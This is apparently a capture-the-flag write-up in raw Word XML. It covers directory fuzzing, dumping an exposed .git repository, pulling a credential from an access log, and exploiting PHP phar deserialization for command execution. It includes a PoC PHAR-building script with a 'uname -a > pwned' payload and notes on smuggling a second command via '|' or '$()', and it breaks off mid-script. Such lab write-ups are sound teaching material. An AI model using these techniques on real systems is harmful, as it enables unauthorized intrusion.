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CHUVINHA ENG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xx81bkqe2bzo"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v0rx59lgz0kn"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108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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2108200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>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port 80:</w:t>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2dmu5nkh9uvq" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3124200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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go85kqm0owpq" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</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use a tool called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 which uses an existing wordlist of possible common directory names and attempts to load all directory names in that wordlist, then checks the status code. (If you are using Kali or ParrotOS, you can find these wordlists in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or you can use those from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists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089400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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an exposed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.git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directory among other interesting directories and files.</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at the source code of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can find a (fake flag).</w:t>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44800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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dump this exposed git repository. For that, we will use the tool below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/internetwache/GitTools.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:pict>
          <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2362200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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30500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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at the dump files, we can find the first flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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84400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access_log.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep</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to find a credential, since we have a login panel:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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both"/>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2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cat access_log.txt | grep "pass*"</w:t>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66900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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Here, we find a credential. We can notice that the password is encoded with (url-encode). An alternative to decode it is to use the website below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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UrlDecode.org</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Decode a string that has been URL encoded</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.urldecode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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86000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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are able to log in =)</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838700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Once logged in, we will perform a code review, since we have the source code </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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86000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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Analyzing the source code, we can pass a URL and it will perform a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</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on that URL, downloading the file and saving it as → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(random.png)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We cannot trigger an RCE here because it is using the function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">escapeshellarg()</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Then it runs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filesize()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the file and returns the output on the page.</w:t>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 little above, we have something interesting:</w:t>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74800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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Insecure deserialization with phar files.</w:t>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Here we can see that it is using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function and executing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm</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on → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$package_name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If we can control it, we will have RCE!</w:t>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hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=fHZKSCMWqF4</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>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 recommend checking the links above to better understand it =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One option is to use the ready-made script below:</w:t>
      </w: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hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md#php-phar-deserialization</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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class PDFGenerator { }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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//Create a new instance of the Dummy class and modify its property</w:t>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$dummy = new PDFGenerator();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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$dummy-&gt;callback = "passthru";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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$dummy-&gt;fileName = "uname -a &gt; pwned"; //our payload</w:t>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Delete any existing PHAR archive with that name</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@unlink("poc.phar");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Create a new archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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$poc = new Phar("poc.phar");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Add all write operations to a buffer, without modifying the archive on disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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$poc-&gt;startBuffering();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Set the stub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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$poc-&gt;setStub("&lt;?php echo 'Here is the STUB!'; __HALT_COMPILER();");</w:t>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Add a new file in the archive with "text" as its content*/</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$poc["file"] = "text";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Add the dummy object to the metadata. This will be serialized</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$poc-&gt;setMetadata($dummy);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Stop buffering and write changes to disk</w:t>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$poc-&gt;stopBuffering();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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script in hand, we can start modifying it:</w:t>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1 - First, change the class name to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Package</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">2 - Then change the object </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filename </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">property to match the object where we need to write our payload;</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">3 - Bypass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, here we can use several techniques such as (</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), so it executes our second command =)</w:t>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modification, the script will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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class Package { }</w:t>
      </w:r>
    </w:p>
